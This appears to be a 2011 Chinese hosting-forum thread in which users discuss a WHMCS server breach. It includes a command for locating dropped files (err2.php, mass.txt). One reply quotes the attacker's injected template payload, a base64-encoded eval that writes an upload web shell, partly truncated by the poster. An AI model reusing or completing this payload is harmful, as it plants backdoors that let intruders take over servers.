全球主机交流论坛

标题: 悲催,前几天的WHMCS补丁,俺打了,然后入侵了 [打印本页]
作者: deak17    时间: 2011-12-4 16:44
标题: 悲催,前几天的WHMCS补丁,俺打了,然后入侵了
前几天的WHMCS补丁,俺打了,然后被入侵了

各位找下有没有err2.php文件吧,还好Linode提醒,不然又有得玩的了

  2. find /home/ -name err2.php
复制代码
作者: UCVPS    时间: 2011-12-4 16:45
这个文件在whmcs哪个目录下?



是打补丁打晚了还是打了也被入侵了?
作者: Kvm    时间: 2011-12-4 16:46
作者: deak17    时间: 2011-12-4 16:47
我这边发现有两个,一个在attachments,一个在images下

然后再找下一个mass.txt的文件
作者: javaluo    时间: 2011-12-4 16:47
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgk省略几个字母'));{/php}
作者: deak17    时间: 2011-12-4 16:48
0
作者: 汉陈帝国    时间: 2011-12-4 16:49
杯具。。
作者: 用户名    时间: 2011-12-4 16:51
无限悲催
作者: deak17    时间: 2011-12-4 16:52
是刚入侵的(12.4),补丁是12.2的,暂时还不懂怎么入侵法
作者: 哈P哥    时间: 2011-12-4 16:54
又有洞洞了啊?
作者: lazyzhu    时间: 2011-12-4 16:56
噢也,打之前就入侵了,留了backdoor
作者: deak17    时间: 2011-12-4 17:00
原帖由 lazyzhu 于 2011-12-4 16:56 发表
噢也,打之前就入侵了,留了backdoor

嗯,应该是。
作者: Captain    时间: 2011-12-4 17:10
http://loc.mjj8.eu.org/thread-92459-1-1.html
作者: cquyf    时间: 2011-12-4 17:22
这么悲剧啊
作者: lizh8791    时间: 2011-12-4 17:24
提示: 作者被禁止或删除 内容自动屏蔽
作者: 母‪鸡    时间: 2011-12-4 17:38
哦不也,我朋友的0day居然被修复了,哦不也。。
作者: ai58    时间: 2011-12-4 19:46
悲剧的。。。
作者: 狼族工作室    时间: 2011-12-4 20:07
作者: 有个就好    时间: 2011-12-4 20:37
后门
作者: cxd44    时间: 2011-12-4 20:51
0day。。。
作者: catding    时间: 2011-12-4 23:51
最近也发现不少人在试探我后台的密码。无语了。网址他们都是怎么知道的呢。



欢迎光临 全球主机交流论坛 (https://loc.mjj8.eu.org/) Powered by Discuz! X3.4